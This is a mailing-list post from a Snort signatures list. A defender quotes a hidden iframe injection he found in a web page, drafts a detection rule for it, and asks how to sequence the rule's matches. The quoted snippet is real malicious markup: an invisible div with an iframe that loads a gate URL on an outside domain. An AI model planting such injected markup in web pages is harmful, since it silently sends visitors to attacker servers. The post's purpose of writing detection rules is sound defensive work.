[Snort-sigs] Rule thought

James Lay jlay at ...3266...
Mon Aug 6 14:13:28 EDT 2012


All,

Recently (today) I ran into the below:

<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div 
class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673   
frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 
border=0></iframe></div><!--/qpi-->

I've not seen an iframe injection that included a specified class 
before.  My original draft rule looked like:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; 
pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; 
classtype:web-application-attack; sid:10000017; rev:1;)

But this looks pretty expensive.  I'm sure there's a better way to 
match this...would it be something like:

content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe 
src";

My question is how do I tell Snort to match all three consecutively?  I 
get that I could use within, but would that apply to the pcre?  Thanks 
for any advice.

James




More information about the Snort-sigs mailing list